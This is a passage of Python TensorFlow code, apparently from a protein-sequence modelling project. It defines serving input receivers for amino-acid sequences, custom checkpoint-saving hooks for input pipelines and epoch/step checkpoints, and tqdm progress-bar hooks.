id=327, shape=(3,), dtype=int32, numpy=array([3, 4, 2])>}\n iterator = tfe.Iterator(dataset)\n print(iterator.next())\n\n decoded = [\n tf.decode_raw(\n bytes=x, out_type=tf.uint8, little_endian=True, name=None\n ) for x in sequence['protein']\n ]\n\n\ndef make_sequence(protein):\n sequence = {}\n sequence['protein'] = tf.cast(x=protein, dtype=tf.int32, name=None)\n sequence['lengths'] = tf.shape(input=protein, name=None,\n out_type=tf.int32)[0]\n return sequence\n\n\ndef serving_input_str_receiver_fn():\n \"\"\"An input receiver that expects a serialized tf.SequenceExample.\"\"\"\n serialized = tf.placeholder(\n dtype=tf.string, shape=[None], name='input_protein_string_tensor'\n )\n mapping = tf.constant([x for x in aa_list])\n table = tf.contrib.lookup.index_table_from_tensor(\n mapping=mapping, num_oov_buckets=1, default_value=-1\n )\n receiver_tensors = {'protein_sequences': serialized}\n mode = tf.estimator.ModeKeys.PREDICT\n dataset = tf.data.Dataset.from_tensor_slices(serialized)\n dataset = dataset.map(\n lambda x: table.lookup(tf.string_split([x], delimiter=\"\").values)\n )\n dataset = dataset.map(make_sequence)\n # dataset = dataset.map(functools.partial(parse_sequence_example, mode=mode))\n dataset = dataset.padded_batch(\n batch_size=1000000, padded_shapes={\n 'protein': [None],\n 'lengths': []\n }\n )\n sequences = tf.data.experimental.get_single_element(dataset)\n return tf.estimator.export.ServingInputReceiver(sequences, receiver_tensors)\n\n\ndef serving_input_dataset_receiver_fn():\n \"\"\"An input receiver that expects a serialized tf.SequenceExample.\"\"\"\n serialized = tf.placeholder(\n dtype=tf.string, shape=[None], name='input_example_tensor'\n )\n print_op = tf.print(\n \"serialized:\",\n serialized,\n serialized[0].dtype,\n output_stream=sys.stderr\n )\n # tf.logging.info(\"serialized:\", serialized, type(serialized[0]))\n receiver_tensors = {'sequences': serialized}\n mode = tf.estimator.ModeKeys.PREDICT\n with tf.control_dependencies([print_op]):\n dataset = tf.data.Dataset.from_tensor_slices(serialized)\n dataset = dataset.map(\n functools.partial(parse_sequence_example, mode=mode),\n num_parallel_calls=None\n )\n dataset = dataset.padded_batch(\n batch_size=1000000,\n padded_shapes={\n 'protein': [None],\n 'lengths': []\n }\n )\n sequences = tf.data.experimental.get_single_element(dataset)\n return tf.estimator.export.ServingInputReceiver(\n sequences, receiver_tensors\n )\n\n\ndef serving_input_receiver_fn():\n \"\"\"An input receiver that expects a serialized tf.SequenceExample.\"\"\"\n serialized = tf.placeholder(\n dtype=tf.string, shape=[None], name='input_example_tensor'\n )\n receiver_tensors = {'sequences': serialized}\n context_features = {\n # 'length': tf.FixedLenFeature([], dtype=tf.int64)\n }\n sequence_features = {\n 'protein': tf.FixedLenSequenceFeature([], dtype=tf.string)\n }\n context, sequence, lengths = tf.io.parse_sequence_example(\n serialized=serialized,\n # A scalar (0-D Tensor) of type string, a single binary\n # serialized `SequenceExample` proto.\n context_features=context_features,\n # A `dict` mapping feature keys to `FixedLenFeature` or\n # `VarLenFeature` values. These features are associated with a\n # `SequenceExample` as a whole.\n sequence_features=sequence_features,\n # A `dict` mapping feature keys to\n # `FixedLenSequenceFeature` or `VarLenFeature` values. These features are\n # associated with data within the `FeatureList` section of the\n # `SequenceExample` proto.\n example_names=None,\n # A scalar (0-D Tensor) of strings (optional), the name of\n # the serialized proto.\n name=None\n # A name for this operation (optional).\n )\n sequence['protein'] = tf.decode_raw(\n bytes=sequence['protein'],\n out_type=tf.uint8,\n little_endian=True,\n name=None\n )\n # tf.Tensor: shape=(sequence_length, 1), dtype=uint8\n sequence['protein'] = tf.cast(\n x=sequence['protein'], dtype=tf.int32, name=None\n )\n # embedding_lookup expects int32 or int64\n # tf.Tensor: shape=(sequence_length, 1), dtype=int32\n sequence['protein'] = tf.squeeze(\n input=sequence['protein'],\n axis=[],\n # An optional list of `ints`. Defaults to `[]`.\n # If specified, only squeezes the dimensions listed. The dimension\n # index starts at 0. It is an error to squeeze a dimension that is not 1.\n # Must be in the range `[-rank(input), rank(input))`.\n name=None\n )\n # tf.Tensor: shape=(sequence_length, ), dtype=int32\n # tf.Tensor: shape=(batch_size, sequence_length, ), dtype=int32\n # protein = tf.one_hot(protein, params.vocab_size)\n sequence['lengths'] = lengths['protein']\n return tf.estimator.export.ServingInputReceiver(sequence, receiver_tensors)\n\n\nclass EpochCheckpointInputPipelineHookSaver(tf.train.Saver):\n \"\"\"`Saver` with a different default `latest_filename`.\n\n This is used in the `CheckpointInputPipelineHook` to avoid conflicts with\n the model ckpt saved by the `CheckpointSaverHook`.\n \"\"\"\n def __init__(\n self,\n var_list,\n latest_filename,\n sharded=False,\n max_to_keep=5,\n keep_checkpoint_every_n_hours=10000.0,\n defer_build=False,\n save_relative_paths=True\n ):\n super(EpochCheckpointInputPipelineHookSaver, self).__init__(\n var_list,\n sharded=sharded,\n max_to_keep=max_to_keep,\n keep_checkpoint_every_n_hours=keep_checkpoint_every_n_hours,\n defer_build=defer_build,\n save_relative_paths=save_relative_paths\n )\n self._latest_filename = latest_filename\n\n def save(\n self,\n sess,\n save_path,\n global_step=None,\n latest_filename=None,\n meta_graph_suffix=\"meta\",\n write_meta_graph=True,\n write_state=True,\n strip_default_attrs=False\n ):\n return super(EpochCheckpointInputPipelineHookSaver, self).save(\n sess, save_path, global_step, latest_filename or\n self._latest_filename, meta_graph_suffix, write_meta_graph,\n write_state, strip_default_attrs\n )\n\n\nclass EpochCheckpointInputPipelineHook(tf.train.SessionRunHook):\n \"\"\"Checkpoints input pipeline state every N steps or seconds.\n\n This hook saves the state of the iterators in the `Graph` so that when\n training is resumed the input pipeline continues from where it left off.\n This could potentially avoid overfitting in certain pipelines where the\n number of training steps per eval are small compared to the dataset\n size or if the training pipeline is pre-empted.\n\n Differences from `CheckpointSaverHook`:\n 1. Saves only the input pipelines in the \"iterators\" collection and not the\n global variables or other saveable objects.\n 2. Does not write the `GraphDef` and `MetaGraphDef` to the summary.\n\n Example of checkpointing the training pipeline:\n\n ```python\n est = tf.estimator.Estimator(model_fn)\n while True:\n est.train(\n train_input_fn,\n hooks=[tf.contrib.data.CheckpointInputPipelineHook(est)],\n steps=train_steps_per_eval)\n # Note: We do not pass the hook here.\n metrics = est.evaluate(eval_input_fn)\n if should_stop_the_training(metrics):\n break\n ```\n\n This hook should be used if the input pipeline state needs to be saved\n separate from the model checkpoint. Doing so may be useful for a few reasons:\n 1. The input pipeline checkpoint may be large, if there are large shuffle\n or prefetch buffers for instance, and may bloat the checkpoint size.\n 2. If the input pipeline is shared between training and validation, restoring\n the checkpoint during validation may override the validation input\n pipeline.\n\n For saving the input pipeline checkpoint alongside the model weights use\n @{tf.contrib.data.make_saveable_from_iterator} directly to create a\n `SaveableObject` and add to the `SAVEABLE_OBJECTS` collection. Note, however,\n that you will need to be careful not to restore the training iterator during\n eval. You can do that by not adding the iterator to the SAVEABLE_OBJECTS\n collector when building the eval graph.\n \"\"\"\n def __init__(\n self,\n checkpoint_dir,\n config,\n save_timer=None,\n save_secs=None,\n save_steps=None,\n checkpoint_basename=\"input\",\n listeners=None,\n defer_build=False,\n save_relative_paths=True\n ):\n \"\"\"Initializes a `EpochCheckpointInputPipelineHook`.\n Creates a custom EpochCheckpointInputPipelineHookSaver\n\n Args:\n checkpoint_dir: `str`, base directory for the checkpoint files.\n save_timer: `SecondOrStepTimer`, timer to save checkpoints.\n save_secs: `int`, save every N secs.\n save_steps: `int`, save every N steps.\n checkpoint_basename: `str`, base name for the checkpoint files.\n listeners: List of `CheckpointSaverListener` subclass instances.\n Used for callbacks that run immediately before or after this hook saves\n the checkpoint.\n config: tf.estimator.RunConfig.\n\n Raises:\n ValueError: One of `save_steps` or `save_secs` should be set.\n ValueError: At most one of saver or scaffold should be set.\n \"\"\"\n # `checkpoint_basename` is \"input.ckpt\" for non-distributed pipelines or\n # of the form \"input_<task_type>_<task_id>.ckpt\" for distributed pipelines.\n # Note: The default `checkpoint_basename` used by `CheckpointSaverHook` is\n # \"model.ckpt\". We intentionally choose the input pipeline checkpoint prefix\n # to be different to avoid conflicts with the model checkpoint.\n\n # pylint: disable=protected-access\n tf.logging.info(\"Create EpochCheckpointInputPipelineHook.\")\n self._checkpoint_dir = checkpoint_dir\n self._config = config\n self._defer_build = defer_build\n self._save_relative_paths = save_relative_paths\n\n self._checkpoint_prefix = checkpoint_basename\n if self._config.num_worker_replicas > 1:\n # Distributed setting.\n suffix = \"_{}_{}\".format(\n self._config.task_type, self._config.task_id\n )\n self._checkpoint_prefix += suffix\n # pylint: enable=protected-access\n\n # We use a composition paradigm instead of inheriting from\n # `CheckpointSaverHook` because `Estimator` does an `isinstance` check\n # to check whether a `CheckpointSaverHook` is already present in the list\n # of hooks and if not, adds one. Inheriting from `CheckpointSaverHook`\n # would thwart this behavior. This hook checkpoints *only the iterators*\n # and not the graph variables.\n self._save_path = os.path.join(checkpoint_dir, checkpoint_basename)\n if save_timer:\n self._timer = save_timer\n else:\n self._timer = tf.train.SecondOrStepTimer(\n every_secs=save_secs, every_steps=save_steps\n )\n self._listeners = listeners or []\n self._steps_per_run = 1\n\n # Name for the protocol buffer file that will contain the list of most\n # recent checkpoints stored as a `CheckpointState` protocol buffer.\n # This file, kept in the same directory as the checkpoint files, is\n # automatically managed by the `Saver` to keep track of recent checkpoints.\n # The default name used by the `Saver` for this file is \"checkpoint\". Here\n # we use the name \"checkpoint_<checkpoint_prefix>\" so that in case the\n # `checkpoint_dir` is the same as the model checkpoint directory, there are\n # no conflicts during restore.\n self._latest_filename = self._checkpoint_prefix + '.latest'\n self._first_run = True\n\n def _set_steps_per_run(self, steps_per_run):\n self._steps_per_run = steps_per_run\n\n def begin(self):\n \"\"\"Called once before using the session.\n\n When called, the default graph is the one that will be launched in the\n session. The hook can modify the graph by adding new operations to it.\n After the `begin()` call the graph will be finalized and the other callbacks\n can not modify the graph anymore. Second call of `begin()` on the same\n graph, should not change the graph.\n \"\"\"\n # Build a Saver that saves all iterators in the `GLOBAL_ITERATORS`\n # collection\n iterators = tf.get_collection(iterator_ops.GLOBAL_ITERATORS)\n saveables = [_Saveable(i) for i in iterators]\n self._saver = EpochCheckpointInputPipelineHookSaver(\n saveables,\n self._latest_filename,\n sharded=False,\n max_to_keep=self._config.keep_checkpoint_max,\n keep_checkpoint_every_n_hours=self._config.\n keep_checkpoint_every_n_hours,\n defer_build=self._defer_build,\n save_relative_paths=self._save_relative_paths\n )\n\n self._summary_writer = tf.summary.FileWriterCache.get(\n self._checkpoint_dir\n )\n self._global_step_tensor = training_util._get_or_create_global_step_read(\n ) # pylint: disable=protected-access\n if self._global_step_tensor is None:\n raise RuntimeError(\n \"Global step should be created to use EpochCheckpointInputPipelineHook.\"\n )\n for l in self._listeners:\n l.begin()\n\n def after_create_session(self, session, coord):\n \"\"\"Called when new TensorFlow session is created.\n\n This is called to signal the hooks that a new session has been created. This\n has two essential differences with the situation in which `begin` is called:\n\n * When this is called, the graph is finalized and ops can no longer be added\n to the graph.\n * This method will also be called as a result of recovering a wrapped\n session, not only at the beginning of the overall session.\n\n Args:\n session: A TensorFlow Session that has been created.\n coord: A Coordinator object which keeps track of all threads.\n \"\"\"\n global_step = session.run(self._global_step_tensor)\n self._timer.update_last_triggered_step(global_step)\n\n def _maybe_restore_input_ckpt(self, session):\n # Ideally this should be run in after_create_session but is not for the\n # following reason:\n # Currently there is no way of enforcing an order of running the\n # `SessionRunHooks`. Hence it is possible that the `_DatasetInitializerHook`\n # is run *after* this hook. That is troublesome because\n # 1. If a checkpoint exists and this hook restores it, the initializer hook\n # will override it.\n # 2. If no checkpoint exists, this hook will try to save an initialized\n # iterator which will result in an exception.\n #\n # As a temporary fix we enter the following implicit contract between this\n # hook and the _DatasetInitializerHook.\n # 1. The _DatasetInitializerHook initializes the iterator in the call to\n # after_create_session.\n # 2. This hook saves the iterator on the first call to `before_run()`, which\n # is guaranteed to happen after `after_create_session()` of all hooks\n # have been run.\n\n # Check if there is an existing checkpoint. If so, restore from it.\n # pylint: disable=protected-access\n latest_checkpoint_path = tf.train.latest_checkpoint(\n self._checkpoint_dir, latest_filename=self._latest_filename\n )\n if latest_checkpoint_path:\n self._get_saver().restore(session, latest_checkpoint_path)\n\n def before_run(self, run_context):\n \"\"\"Called before each call to run().\n\n You can return from this call a `SessionRunArgs` object indicating ops or\n tensors to add to the upcoming `run()` call. These ops/tensors will be run\n together with the ops/tensors originally passed to the original run() call.\n The run args you return can also contain feeds to be added to the run()\n call.\n\n The `run_context` argument is a `SessionRunContext` that provides\n information about the upcoming `run()` call: the originally requested\n op/tensors, the TensorFlow Session.\n\n At this point graph is finalized and you can not add ops.\n\n Args:\n run_context: A `SessionRunContext` object.\n\n Returns:\n None or a `SessionRunArgs` object.\n \"\"\"\n if self._first_run:\n self._maybe_restore_input_ckpt(run_context.session)\n self._first_run = False\n return tf.train.SessionRunArgs(self._global_step_tensor)\n\n def after_run(self, run_context, run_values):\n stale_global_step = run_values.results\n if self._timer.should_trigger_for_step(\n stale_global_step + self._steps_per_run\n ):\n # get the real value after train op.\n global_step = run_context.session.run(self._global_step_tensor)\n if self._timer.should_trigger_for_step(global_step):\n self._timer.update_last_triggered_step(global_step)\n if self._save(run_context.session, global_step):\n run_context.request_stop()\n\n def end(self, session):\n \"\"\"Called at the end of session.\n\n The `session` argument can be used in case the hook wants to run final ops,\n such as saving a last checkpoint.\n\n If `session.run()` raises exception other than OutOfRangeError or\n StopIteration then `end()` is not called.\n Note the difference between `end()` and `after_run()` behavior when\n `session.run()` raises OutOfRangeError or StopIteration. In that case\n `end()` is called but `after_run()` is not called.\n\n Args:\n session: A TensorFlow Session that will be soon closed.\n \"\"\"\n\n # delete latest checkpoint file\n input_checkpoint_files = Path(self._checkpoint_dir\n ).glob(self._checkpoint_prefix + '*')\n # print(input_checkpoint_files)\n for f in input_checkpoint_files:\n if f.exists():\n f.unlink()\n # print('DELETE: ', f)\n tf.logging.debug(\"Removed input checkpoints\")\n\n last_step = session.run(self._global_step_tensor)\n for l in self._listeners:\n l.end(session, last_step)\n\n def _save(self, session, step):\n \"\"\"Saves the latest checkpoint, returns should_stop.\"\"\"\n tf.logging.info(\n \"Saving\\033[31m input\\033[0m checkpoints for %d into %s.\", step,\n self._save_path\n )\n\n for l in self._listeners:\n l.before_save(session, step)\n\n self._get_saver().save(session, self._save_path, global_step=step)\n self._summary_writer.add_session_log(\n SessionLog(\n status=SessionLog.CHECKPOINT, checkpoint_path=self._save_path\n ), # pylint: disable=no-member\n step\n )\n\n should_stop = False\n for l in self._listeners:\n if l.after_save(session, step):\n tf.logging.info(\n \"A CheckpointSaverListener requested that training be stopped. \"\n \"listener: {}\".format(l)\n )\n should_stop = True\n return should_stop\n\n def _get_saver(self):\n return self._saver\n\n\nclass EpochCheckpointSaverHook(tf.train.CheckpointSaverHook):\n \"\"\"This checkpoint saver hook saves two types of checkpoints:\n\n 1. step:\n * Saves on save_secs or save_steps\n * Does not save on begin or end\n * Saves input pipeline state to continue training the remaining examples in the current epoch\n * Separately configurable garbage collection criteria from epoch\n * Defaults: max_to_keep=10, keep_checkpoint_every_n_hours=6\n * The default list of CheckpointSaverListener does not run on step checkpoint saves,\n you may configure a separate list of CheckpointSaverListeners by setting the step_listeners init arg\n * filename = step\n * latest_filename = step.latest\n\n 2. epoch:\n * Does not save on save_secs or save_steps\n * Saves on epoch end\n * Does not save input pipeline\n * Separately configurable garbage collection criteria from step\n * Does not garbage collect by default\n * Defaults: max_to_keep=9999, keep_checkpoint_every_n_hours=999999\n * set epoch_saver to a custom tf.train.Saver to change defaults\n * The default list of CheckpointSaverListener only runs on epoch checkpoint saves,\n this includes the default _NewCheckpointListenerForEvaluate added by tf.estimator.train_and_evaluate\n which runs the eval loop after every new checkpoint\n * filename = epoch\n * latest_filename = epoch.latest\n\n Usage:\n * Added to the list of EstimatorSpec.training_chief_hooks in your model_fn.\n * This prevents the default CheckpointSaverHook from being added\n * The end of an \"epoch\" is defined as the input_fn raising the OutOfRangeError,\n don't repeat the dataset or set the repeat_count to 1 if you want the \"expected\" behavior of\n one \"epoch\" being one iteration over all of the training data.\n * estimator.train or tf.estimator.train_and_evaluate will exit after the OutOfRangeError,\n wrap it with a for loop to train a limited number of epochs or a while True loop to train forever.\n\n Fixes more than one graph event per run warning in Tensorboard\n \"\"\"\n def __init__(\n self,\n checkpoint_dir,\n epoch_tensor=None,\n save_timer=None,\n save_secs=None,\n save_steps=None,\n saver=None,\n checkpoint_basename=None,\n scaffold=None,\n listeners=None,\n step_listeners=None,\n epoch_saver=None,\n epoch_basename='epoch',\n step_basename='step',\n epoch_latest_filename='epoch.latest',\n step_latest_filename='step.latest'\n ):\n \"\"\"Maintains compatibility with the `CheckpointSaverHook`.\n\n Args:\n checkpoint_dir: `str`, base directory for the checkpoint files.\n save_timer: `SecondOrStepTimer`, timer to save checkpoints.\n save_secs: `int`, save a step checkpoint every N secs.\n save_steps: `int`, save a step checkpoint every N steps.\n saver: `Saver` object, used for saving a final step checkpoint.\n checkpoint_basename: `str`, base name for the checkpoint files.\n scaffold: `Scaffold`, use to get saver object a final step checkpoint.\n listeners: List of `CheckpointSaverListener` subclass instances.\n Used for callbacks that run immediately before or after this hook saves\n a epoch checkpoint.\n step_listeners: List of `CheckpointSaverListener` subclass instances.\n Used for callbacks that run immediately before or after this hook saves\n a step checkpoint.\n epoch_saver: `Saver` object, used for saving a epoch checkpoint.\n step_basename: `str`, base name for the step checkpoint files.\n epoch_basename: `str`, base name for the epoch checkpoint files.\n\n Raises:\n ValueError: One of `save_steps` or `save_secs` should be set.\n ValueError: At most one of saver or scaffold should be set.\n \"\"\"\n tf.logging.info(\"Create EpochCheckpointSaverHook.\")\n if saver is not None and scaffold is not None:\n raise ValueError(\"You cannot provide both saver and scaffold.\")\n self._saver = saver\n self._checkpoint_dir = checkpoint_dir\n checkpoint_basename = checkpoint_basename or ''\n epoch_basename = ''.join(\n (checkpoint_basename, epoch_basename or 'step')\n )\n step_basename = ''.join((checkpoint_basename, step_basename or 'step'))\n self._epoch_save_path = os.path.join(checkpoint_dir, epoch_basename)\n self._step_save_path = os.path.join(checkpoint_dir, step_basename)\n self._epoch_latest_filename = epoch_latest_filename or 'epoch.latest'\n self._step_latest_filename = step_latest_filename or 'step.latest'\n self._scaffold = scaffold\n if save_timer:\n self._timer = save_timer\n else:\n self._timer = tf.train.SecondOrStepTimer(\n every_secs=save_secs, every_steps=save_steps\n )\n self._epoch_listeners = listeners or []\n # In _train_with_estimator_spec\n # saver_hooks[0]._listeners.extend(saving_listeners)\n self._step_listeners = step_listeners or []\n self._listeners = self._step_listeners\n self._epoch_saver = epoch_saver\n self._steps_per_run = 1\n self._epoch_tensor = epoch_tensor\n\n def _set_steps_per_run(self, steps_per_run):\n self._steps_per_run = steps_per_run\n\n def begin(self):\n \"\"\"Called once before using the session.\n\n When called, the default graph is the one that will be launched in the\n session. The hook can modify the graph by adding new operations to it.\n After the `begin()` call the graph will be finalized and the other callbacks\n can not modify the graph anymore. Second call of `begin()` on the same\n graph, should not change the graph.\n \"\"\"\n self._summary_writer = tf.summary.FileWriterCache.get(\n self._checkpoint_dir\n )\n self._global_step_tensor = training_util._get_or_create_global_step_read(\n ) # pylint: disable=protected-access\n if self._global_step_tensor is None:\n raise RuntimeError(\n \"Global step should be created to use EpochCheckpointSaverHook.\"\n )\n\n if self._epoch_saver is None:\n self._epoch_saver = tf.train.Saver(\n sharded=False,\n max_to_keep=9999,\n keep_checkpoint_every_n_hours=999999,\n defer_build=False,\n save_relative_paths=True\n )\n\n for l in self._epoch_listeners:\n l.begin()\n for l in self._step_listeners:\n l.begin()\n l._is_first_run = False\n\n def after_create_session(self, session, coord):\n \"\"\"Called when new TensorFlow session is created.\n\n This is called to signal the hooks that a new session has been created. This\n has two essential differences with the situation in which `begin` is called:\n\n * When this is called, the graph is finalized and ops can no longer be added\n to the graph.\n * This method will also be called as a result of recovering a wrapped\n session, not only at the beginning of the overall session.\n\n Args:\n session: A TensorFlow Session that has been created.\n coord: A Coordinator object which keeps track of all threads.\n \"\"\"\n global_step = session.run(self._global_step_tensor)\n # We do write graph and saver_def at the first call of before_run.\n # We cannot do this in begin, since we let other hooks to change graph and\n # add variables in begin. Graph is finalized after all begin calls.\n tf.train.write_graph(\n tf.get_default_graph().as_graph_def(add_shapes=True),\n self._checkpoint_dir, \"graph.pbtxt\"\n )\n saver_def = self._get_saver().saver_def if self._get_saver() else None\n graph = tf.get_default_graph()\n meta_graph_def = meta_graph.create_meta_graph_def(\n graph_def=graph.as_graph_def(add_shapes=True), saver_def=saver_def\n )\n self._summary_writer.add_graph(graph, global_step=global_step)\n self._summary_writer.add_meta_graph(\n meta_graph_def, global_step=global_step\n )\n # The checkpoint saved here is the state at step \"global_step\".\n # do not save any checkpoints at start\n # self._save(session, global_step)\n self._timer.update_last_triggered_step(global_step)\n\n def before_run(self, run_context): # pylint: disable=unused-argument\n \"\"\"Called before each call to run().\n\n You can return from this call a `SessionRunArgs` object indicating ops or\n tensors to add to the upcoming `run()` call. These ops/tensors will be run\n together with the ops/tensors originally passed to the original run() call.\n The run args you return can also contain feeds to be added to the run()\n call.\n\n The `run_context` argument is a `SessionRunContext` that provides\n information about the upcoming `run()` call: the originally requested\n op/tensors, the TensorFlow Session.\n\n At this point graph is finalized and you can not add ops.\n\n Args:\n run_context: A `SessionRunContext` object.\n\n Returns:\n None or a `SessionRunArgs` object.\n \"\"\"\n return tf.train.SessionRunArgs(self._global_step_tensor)\n\n def after_run(self, run_context, run_values):\n \"\"\"Called after each call to run().\n\n The `run_values` argument contains results of requested ops/tensors by\n `before_run()`.\n\n The `run_context` argument is the same one send to `before_run` call.\n `run_context.request_stop()` can be called to stop the iteration.\n\n If `session.run()` raises any exceptions then `after_run()` is not called.\n\n Args:\n run_context: A `SessionRunContext` object.\n run_values: A SessionRunValues object.\n \"\"\"\n stale_global_step = run_values.results\n if self._timer.should_trigger_for_step(\n stale_global_step + self._steps_per_run\n ):\n # get the real value after train op.\n global_step = run_context.session.run(self._global_step_tensor)\n if self._timer.should_trigger_for_step(global_step):\n self._timer.update_last_triggered_step(global_step)\n if self._save_step(run_context.session, global_step):\n run_context.request_stop()\n\n def end(self, session):\n \"\"\"Called at the end of session.\n\n The `session` argument can be used in case the hook wants to run final ops,\n such as saving a last checkpoint.\n\n If `session.run()` raises exception other than OutOfRangeError or\n StopIteration then `end()` is not called.\n Note the difference between `end()` and `after_run()` behavior when\n `session.run()` raises OutOfRangeError or StopIteration. In that case\n `end()` is called but `after_run()` is not called.\n\n Args:\n session: A TensorFlow Session that will be soon closed.\n \"\"\"\n # savables = tf.get_collection(tf.GraphKeys.SAVEABLE_OBJECTS)\n # savables_ref = tf.get_collection_ref(tf.GraphKeys.SAVEABLE_OBJECTS)\n # print('SAVEABLE_OBJECTS before', len(savables_ref), savables_ref)\n # # remove tensorflow.contrib.data.python.ops.iterator_ops._Saveable object\n # for v in savables:\n # if isinstance(v, _Saveable):\n # savables_ref.remove(v)\n # print('SAVEABLE_OBJECTS after', len(savables_ref), savables_ref)\n\n last_step = session.run(self._global_step_tensor)\n epoch = None\n if self._epoch_tensor is not None:\n epoch = session.run(self._epoch_tensor)\n\n if last_step != self._timer.last_triggered_step():\n self._save_step(session, last_step)\n\n self._save_epoch(session, last_step, epoch)\n\n for l in self._epoch_listeners:\n # _NewCheckpointListenerForEvaluate will run here at end\n l.end(session, last_step)\n\n for l in self._step_listeners:\n l.end(session, last_step)\n\n def _save_epoch(self, session, step, epoch):\n \"\"\"Saves the latest checkpoint, returns should_stop.\"\"\"\n if epoch:\n save_path = '{}-{}'.format(self._epoch_save_path, epoch)\n else:\n save_path = self._epoch_save_path\n tf.logging.info(\n \"Saving\\033[1;31m epoch\\033[0m checkpoints for %d into %s.\", step,\n save_path\n )\n\n for l in self._epoch_listeners:\n l.before_save(session, step)\n\n self._get_epoch_saver().save(\n sess=session,\n save_path=save_path,\n global_step=step,\n latest_filename=self._epoch_latest_filename,\n meta_graph_suffix=\"meta\",\n write_meta_graph=True,\n write_state=True,\n strip_default_attrs=False\n )\n\n should_stop = False\n for l in self._epoch_listeners:\n # _NewCheckpointListenerForEvaluate will not run here\n # since _is_first_run == True, it will run at end\n if l.after_save(session, step):\n tf.logging.info(\n \"An Epoch CheckpointSaverListener requested that training be stopped. \"\n \"listener: {}\".format(l)\n )\n should_stop = True\n return should_stop\n\n def _save_step(self, session, step):\n \"\"\"Saves the latest checkpoint, returns should_stop.\"\"\"\n tf.logging.info(\n \"Saving\\033[1;31m step\\033[0m checkpoints for %d into %s.\", step,\n self._step_save_path\n )\n\n for l in self._step_listeners:\n l.before_save(session, step)\n\n saver = self._get_step_saver()\n\n saver.save(\n sess=session,\n save_path=self._step_save_path,\n global_step=step,\n # latest_filename=self._step_latest_filename,\n latest_filename=None,\n meta_graph_suffix=\"meta\",\n write_meta_graph=True,\n write_state=True,\n strip_default_attrs=False\n )\n self._summary_writer.add_session_log(\n SessionLog(\n status=SessionLog.CHECKPOINT,\n checkpoint_path=self._step_save_path\n ), # pylint: disable=no-member\n step\n )\n\n should_stop = False\n for l in self._step_listeners:\n if l.after_save(session, step):\n tf.logging.info(\n \"A Step CheckpointSaverListener requested that training be stopped. \"\n \"listener: {}\".format(l)\n )\n should_stop = True\n return should_stop\n\n def _save(self, session, step):\n \"\"\"Saves the latest checkpoint, returns should_stop.\"\"\"\n return self._save_step(session, step)\n\n def _get_epoch_saver(self):\n return self._epoch_saver\n\n def _get_step_saver(self):\n if self._saver is not None:\n return self._saver\n elif self._scaffold is not None:\n return self._scaffold.saver\n\n # Get saver from the SAVERS collection if present.\n collection_key = tf.GraphKeys.SAVERS\n savers = tf.get_collection(collection_key)\n if not savers:\n raise RuntimeError(\n \"No items in collection {}. Please add a saver to the collection \"\n \"or provide a saver or scaffold.\".format(collection_key)\n )\n elif len(savers) > 1:\n raise RuntimeError(\n \"More than one item in collection {}. \"\n \"Please indicate which one to use by passing it to the constructor.\"\n .format(collection_key)\n )\n\n self._saver = savers[0]\n return savers[0]\n\n def _get_saver(self):\n return self._get_step_saver()\n\n\norig_stdout = sys.stdout\n\n\nclass EpochProgressBarHook(tf.train.SessionRunHook):\n def __init__(\n self,\n total,\n initial_tensor,\n n_tensor,\n postfix_tensors=None,\n every_n_iter=None\n ):\n self._total = total\n self._initial_tensor = initial_tensor\n self._n_tensor = n_tensor\n self._postfix_tensors = postfix_tensors\n self._every_n_iter = every_n_iter\n\n def begin(self):\n \"\"\"Called once before using the session.\n\n When called, the default graph is the one that will be launched in the\n session. The hook can modify the graph by adding new operations to it.\n After the `begin()` call the graph will be finalized and the other callbacks\n can not modify the graph anymore. Second call of `begin()` on the same\n graph, should not change the graph.\n \"\"\"\n pass\n\n def after_create_session(self, session, coord):\n \"\"\"Called when new TensorFlow session is created.\n\n This is called to signal the hooks that a new session has been created. This\n has two essential differences with the situation in which `begin` is called:\n\n * When this is called, the graph is finalized and ops can no longer be added\n to the graph.\n * This method will also be called as a result of recovering a wrapped\n session, not only at the beginning of the overall session.\n\n Args:\n session: A TensorFlow Session that has been created.\n coord: A Coordinator object which keeps track of all threads.\n \"\"\"\n initial = session.run(self._initial_tensor)\n epoch = initial // self._total\n epoch_initial = initial % self._total\n # print('after_create_session', initial, epoch)\n # setup progressbar\n self.pbar = tqdm(\n total=self._total,\n unit='seq',\n desc='Epoch {}'.format(epoch),\n mininterval=0.1,\n maxinterval=10.0,\n miniters=None,\n file=orig_stdout,\n dynamic_ncols=True,\n smoothing=0,\n bar_format=None,\n initial=epoch_initial,\n postfix=None\n )\n\n def before_run(self, run_context): # pylint: disable=unused-argument\n \"\"\"Called before each call to run().\n\n You can return from this call a `SessionRunArgs` object indicating ops or\n tensors to add to the upcoming `run()` call. These ops/tensors will be run\n together with the ops/tensors originally passed to the original run() call.\n The run args you return can also contain feeds to be added to the run()\n call.\n\n The `run_context` argument is a `SessionRunContext` that provides\n information about the upcoming `run()` call: the originally requested\n op/tensors, the TensorFlow Session.\n\n At this point graph is finalized and you can not add ops.\n\n Args:\n run_context: A `SessionRunContext` object.\n\n Returns:\n None or a `SessionRunArgs` object.\n \"\"\"\n return tf.train.SessionRunArgs(self._n_tensor)\n\n def after_run(self, run_context, run_values):\n \"\"\"Called after each call to run().\n\n The `run_values` argument contains results of requested ops/tensors by\n `before_run()`.\n\n The `run_context` argument is the same one send to `before_run` call.\n `run_context.request_stop()` can be called to stop the iteration.\n\n If `session.run()` raises any exceptions then `after_run()` is not called.\n\n Args:\n run_context: A `SessionRunContext` object.\n run_values: A SessionRunValues object.\n \"\"\"\n # print('run_values', run_values.results)\n # update progressbar\n self.pbar.update(run_values.results)\n\n def end(self, session):\n \"\"\"Called at the end of session.\n\n The `session` argument can be used in case the hook wants to run final ops,\n such as saving a last checkpoint.\n\n If `session.run()` raises exception other than OutOfRangeError or\n StopIteration then `end()` is not called.\n Note the difference between `end()` and `after_run()` behavior when\n `session.run()` raises OutOfRangeError or StopIteration. In that case\n `end()` is called but `after_run()` is not called.\n\n Args:\n session: A TensorFlow Session that will be soon closed.\n \"\"\"\n self.pbar.close()\n\n\nclass EvalProgressBarHook(tf.train.SessionRunHook):\n def __init__(\n self, total, n_tensor, postfix_tensors=None, every_n_iter=None\n ):\n self._total = total\n self._n_tensor = n_tensor\n\n def begin(self):\n \"\"\"Called once before using the session.\n\n When called, the default graph is the one that will be launched in the\n session. The hook can modify the graph by adding new operations to it.\n After the `begin()` call the graph will be finalized and the other callbacks\n can not modify the graph anymore. Second call of `begin()` on the same\n graph, should not change the graph.\n \"\"\"\n pass\n\n def after_create_session(self, session, coord):\n \"\"\"Called when new TensorFlow session is created.\n\n This is called to signal the hooks that a new session has been created. This\n has 